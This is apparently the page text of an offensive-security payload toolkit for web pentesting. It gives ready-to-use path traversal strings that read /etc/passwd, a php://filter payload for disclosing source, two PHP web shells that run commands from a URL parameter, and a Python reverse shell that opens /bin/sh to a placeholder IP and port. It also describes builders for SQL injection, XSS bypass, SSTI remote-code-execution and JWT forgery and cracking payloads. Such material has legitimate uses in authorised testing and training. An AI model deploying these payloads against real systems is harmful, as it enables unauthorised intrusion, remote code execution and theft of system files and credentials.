OS badge = target OS
๐ Path Traversal
Linux
../../../../etc/passwd
Linux
....//....//....//etc/passwd
Linux
php://filter/convert.base64-encode/resource=index.php
OS badge = target OS
๐ PHP Shells
Linux
<?php system($_GET['cmd']); ?>
Linux
<?php echo shell_exec($_GET['cmd']); ?>
๐ Python Reverse Shell
Linux
import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
๐ SQLi Builder
Paste URL or raw request. Detects params and generates context payloads (auth bypass, UNION probe, error/time-based) per DBMS.
Results appear hereโฆ
๐ฏ XSS Context Builder
Pick injection context โ polyglots + filter-bypass variants.
Results appear hereโฆ
๐งช SSTI Fingerprint
Paste probeโresponse lines (one per line). Identifies engine (Jinja2/Twig/FreeMarker/Velocity/Smarty/Mako/Thymeleaf) + shows RCE payloads.
Results appear hereโฆ
๐ JWT Lab
Decode header/payload ยท alg:none / RS256โHS256 confusion ยท HS256 offline crack (10k wordlist + optional upload).
Results appear hereโฆ
๐จ Request Analyzer
Paste raw HTTP request โ parse method/URL/headers/cookies/body โ per-param suggested payloads + JWT/cookie inspection.
Results appear hereโฆ